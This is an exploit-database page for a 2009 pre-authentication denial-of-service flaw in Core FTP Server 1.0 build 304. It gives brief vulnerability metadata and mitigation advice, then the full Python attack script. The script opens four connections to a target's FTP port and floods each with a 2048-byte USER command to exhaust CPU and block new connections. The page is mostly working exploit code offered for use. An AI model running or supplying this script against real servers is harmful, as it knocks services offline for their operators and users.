Core FTP Server 1.0, build 304 Remote Denial of Service Exploit (Pre Auth)

vendor:

Core FTP Server

by:

Dr_IDE

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Core FTP Server

Affected Version From: 1.0, build 304

Affected Version To: 1.0, build 304

Patch Exists: YES

Related CWE: N/A

CPE: a:coreftp:core_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XPSP3

2009

Core FTP Server 1.0, build 304 Remote Denial of Service Exploit (Pre Auth)

This exploit causes CPU usage to go to 100% and prevent new connections on Core FTP Server 1.0, build 304 by sending malicious USER requests.

Mitigation:

Upgrade to the latest version of Core FTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/env python

###################################################################################
#
# Core FTP Server 1.0, build 304 Remote Denial of Service Exploit (Pre Auth)
# Found By:     Dr_IDE
# Tested On:    Windows XPSP3
# Download:     http://www.coreftp.com/server/
# Notes:	This will cause CPU usage to go to 100% and prevent new connections
# Usage:	./script <Target IP>
#
###################################################################################

import socket, sys

def banner():
	print "\n##################################################################" 
	print "#                                                             	#"
	print "#     Core FTP Server 1.0, build 304 Remote DoS Exploit       	#" 
	print "#                       by Dr_IDE                             	#"
	print "#								#"
	print "##################################################################\n"

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);

buff = ("\x41" * 2048);

try:
	banner();
	print ("[*] Connecting to target...");
	s1.connect((sys.argv[1] , 21));
	s2.connect((sys.argv[1] , 21));
	s3.connect((sys.argv[1] , 21));
	s4.connect((sys.argv[1] , 21));
	print ("[*] Sending evil stuff...");
	s1.send("USER " + buff + "\r\n");
	s2.send("USER " + buff + "\r\n");
	s3.send("USER " + buff + "\r\n");
	s4.send("USER " + buff + "\r\n");	
	print ("[*] Success! The server should now be inaccessible");
	s1.close();
	s2.close();
	s3.close();
	s4.close();

except:
	print ("[-] Could not connect to server.");